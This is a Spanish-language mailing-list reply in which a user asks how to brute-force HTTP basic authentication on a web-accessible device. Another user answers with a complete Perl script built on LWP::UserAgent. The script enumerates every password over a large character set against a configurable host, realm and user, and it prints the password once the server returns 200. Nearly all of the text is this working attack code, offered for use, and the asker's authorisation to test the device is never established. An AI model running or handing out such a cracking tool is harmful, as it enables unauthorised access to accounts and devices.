El 05/07/2010 a las 03:28:08PM +0200, Alejandro Vargas escribió:
> Tengo un dispositivo accesible por web que parece que tiene una clave
> para determinadas funciones que no es la normal. Alguien conoce un
> programa para atacar páginas web con autenticación básica por fuerza
> bruta?
Hace tiempo hice un script para algo similar. Necesita el módulo
LWP::UserAgent (aptitude install libwww-perl)
Slds
--
Horacio
#!/usr/bin/perl
#
use LWP::UserAgent;
$alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 `...@#\$%^&*()-_=+[{]}\\|;:'\",<.>/?";
# Parámetros
#
###############################################################################
$clave_inicial = '';
$realm = 'AuthName'; # Nombre/dominio
$user = 'userName'; # Nombre de usuario
$url = 'www.domain.com:80';
$path = 'private/';
###############################################################################
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
while (1) {
$bfpass = bruteforce($alphabet, $clave_inicial);
$ua->credentials($url, $realm, $user => $bfpass);
$response = $ua->get("http://$url/$path";);
if ($response->code == 200) {
print("Clave: $bfpass\n");
exit;
}
}
#
# de http://www.xenocafe.com/tutorials/perl/bruteforce_password_recovery
#
BEGIN {
# static password
$curentPWD="";
sub bruteforce {
@tmpPWD = ();
my ($ab,$startPWD) = (shift,shift);
$firstChar = substr($ab, 0, 1);
$lastChar = substr($ab, length($ab) - 1, 1);
# start with an assigned password from the command line
if ($startPWD ne "" && $currentPWD eq "") {
$currentPWD = $startPWD;
return $currentPWD;
}
# no password so start with the first character in our alphabet
if ($currentPWD eq "") {
$currentPWD = $firstChar;
return $currentPWD;
}
# if the current password is all of the last character in the alphabet
# then reset it with the first character of the alphabet plus 1 length greater
if ($currentPWD eq fillString(length($currentPWD), $lastChar)) {
$currentPWD = fillString(length($currentPWD) + 1, $firstChar);
return $currentPWD;
}
# convert the password to an array
@tmpPWD = split(//, $currentPWD);
# get the length of the password - 1 (zero based index)
$x = @tmpPWD - 1;
# this portion adjusts the characters
# we go through the array starting with the end of the array and work our way backwords
# if the character is the last one in the alphabet, we change it to the first character
# then move to the next array character
# if we aren't looking at the last alphabet character then we change the array character
# to the next higher value and exit the loop
while (1) {
$iTemp = getPos($ab, $tmpPWD[$x]);
if ($iTemp == getPos($ab, $lastChar)) {
@tmpPWD[$x] = $firstChar;
$x--;
} else {
@tmpPWD[$x] = substr($ab, $iTemp + 1, 1);
last;
}
}
# convert the array back into a string and return the new password to try
$currentPWD = join("", @tmpPWD);
return $currentPWD;
}
}
sub fillString {
my ($len, $char) = (shift, shift);
$str = "";
for ($i=0; $i<$len; $i++) {
$str .= $char;
}
return $str;
}
sub getPos {
my ($ab, $char) = (shift, shift);
for ($i=0; $i<length($ab); $i++) {
if ($char eq substr($ab, $i, 1)) {
return $i;
}
}
}
